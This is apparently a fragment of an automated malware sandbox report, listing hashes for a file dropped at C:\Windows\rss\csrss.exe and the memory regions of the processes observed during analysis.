                                                                                                                                                                9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

                                                                                                                                                              • C:\Windows\rss\csrss.exe
                                                                                                                                                                Filesize

                                                                                                                                                                3MB

                                                                                                                                                                MD5

                                                                                                                                                                2064e3bb7a3826464992decb043a1c13

                                                                                                                                                                SHA1

                                                                                                                                                                ac04cc98f073e6ee77fb56430578b20b07bb9fb0

                                                                                                                                                                SHA256

                                                                                                                                                                ce66310aced7f576549cd39457bbf6a8425c1a0943510d75f7d7ce72b90fdfc0

                                                                                                                                                                SHA512

                                                                                                                                                                9dc5847a95df367f3be4d0dac56afdfd580c1d53b1ca2266cc06e22c9d7b708fcae8f7971fe9d9b848bdb1e8bf8ed9f61334d8a19e68fc400fde269bbb5614c7

                                                                                                                                                              • memory/1316-136-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/1500-137-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/1656-139-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/1676-149-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/2396-147-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/2660-140-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/2660-143-0x0000000001A00000-0x0000000001DA6000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                3MB

                                                                                                                                                              • memory/2660-144-0x0000000000400000-0x0000000001021000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                12MB

                                                                                                                                                              • memory/3128-138-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/3764-130-0x0000000001528000-0x00000000018CE000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                3MB

                                                                                                                                                              • memory/3764-132-0x0000000000400000-0x0000000001021000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                12MB

                                                                                                                                                              • memory/3764-131-0x00000000018D0000-0x0000000001FC5000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                6MB

                                                                                                                                                              • memory/3968-145-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/4104-146-0x0000000000000000-mapping.dmp
                                                                                                                                                              • memory/4764-135-0x0000000000400000-0x0000000001021000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                12MB

                                                                                                                                                              • memory/4764-134-0x00000000015EE000-0x0000000001994000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                3MB

                                                                                                                                                              • memory/4764-133-0x0000000000000000-mapping.dmp